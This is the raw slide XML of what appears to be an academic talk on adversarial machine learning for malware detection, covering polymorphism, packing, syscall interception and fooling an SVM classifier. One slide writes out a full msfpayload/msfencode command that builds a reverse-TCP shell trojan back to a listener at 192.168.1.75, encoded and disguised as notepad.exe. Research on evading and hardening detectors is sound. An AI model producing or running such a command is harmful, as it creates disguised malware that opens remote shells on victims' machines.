            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1"/>
              <a:t>msfpayload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t> windows/shell/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t> LHOST=192.168.1.75 LPORT=4444 R | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1"/>
              <a:t>msfencode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t> -c 5 -e x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1"/>
              <a:t>shikata_ga_nai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t> -x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" err="1"/>
              <a:t>notepad.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t>notepad2.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="902188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Problem Description</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1563976" y="4293064"/>
            <a:ext cx="10628024" cy="2264490"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>How should a virus disguise itself to fool the antivirus? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Adversarial Machine Learning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>What are the important features of malicious executables?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:sym typeface="Wingdings"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="28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8705" y="1497637"/>
            <a:ext cx="6002824" cy="3241169"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="719885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heckerboard(across)">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heckerboard(across)">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Polymorphic Virus</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589212" y="1347776"/>
            <a:ext cx="8915400" cy="2952755"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>mutates on each </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>copy by adding NOPs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>eg1. Adding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>0 to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>register</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>eg2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>ORing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t> a register with itself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>eg3. shifting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>it left 0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>bits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>eg4. jumping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>to the next instruction </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2600" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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227" y="4027284"/>
            <a:ext cx="7344926" cy="2673553"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="178123707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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>xisting Hiding Schemes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1610644" y="2117558"/>
            <a:ext cx="8915400" cy="4604084"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Obfuscation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Executable compression, old yet effective. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Ultimate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Packer for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>executables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>upx.github.io</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>interception</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>antivirus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> scans </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>boot sector </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>, virus in memory just returns the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>true boot sector </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>rather than its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>hiding place in the bad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>block.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Ineffective against privileged antivirus</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="26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9179" y="2776622"/>
            <a:ext cx="3435433" cy="1616674"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="138844116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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589212" y="2133600"/>
            <a:ext cx="8915400" cy="4171950"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0"/>
              <a:t>Antivirus evasion techniques show ease in avoiding antivirus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t>detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Joe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>Granneman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>searchsecurity.techtarget.com/feature/Antivirus-evasion-techniques-show-ease-in-avoiding-antivirus-detection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0"/>
              <a:t>Attacks from Outside the Operating </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0"/>
              <a:t>System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>, Andrew Tanenbaum, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.informit.com/articles/article.aspx?p=26150&amp;seqNum=5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="119210349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&amp; Future Work</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2277979" y="1612232"/>
            <a:ext cx="9442605" cy="4724400"/>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sz="2800" dirty="0" smtClean="0"/>
              <a:t>By modifying Top N attributes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>according</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>RR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>we can fool the given SVM model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Removing attributes works better than adding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>In practice removing attributes is not as realistic </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>as adding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Our hiding scheme serves as the combination of</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> two existing schemes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>On the anti-virus software side: How to be robust against modified malicious samples? (Game theory)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="153802665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sz="4400" dirty="0" smtClean="0"/>
              <a:t>Related</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4400" dirty="0" smtClean="0"/>
              <a:t>Work</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2589212" y="1450121"/>
            <a:ext cx="8915400" cy="5587173"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>N-gram Feature</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0"/>
              <a:t>a1b2c3d4  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t> 3-gram: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" smtClean="0"/>
              <a:t>a1b2c3 &amp; b2c3d4</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Binary/Assembly/DLL N-gram Feature Set</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Hybrid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0"/>
              <a:t>model:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Combine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0"/>
              <a:t>three</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Best 500 features for each set based on Gain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Algorithm: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>libSVM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>Masud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>, Mohammad M., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>Latifur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> Khan, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>Bhavani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1"/>
              <a:t>Thuraisingham</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>. "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0"/>
              <a:t>A hybrid model to detect malicious executables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>." Communications, 2007. ICC'07. IEEE International Conference on. IEEE, 2007.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3639672" y="4035585"/>
            <a:ext cx="6097868" cy="871124"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13714993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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">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nodeType="click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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="3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sz="4400" dirty="0" smtClean="0"/>
              <a:t>Related</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
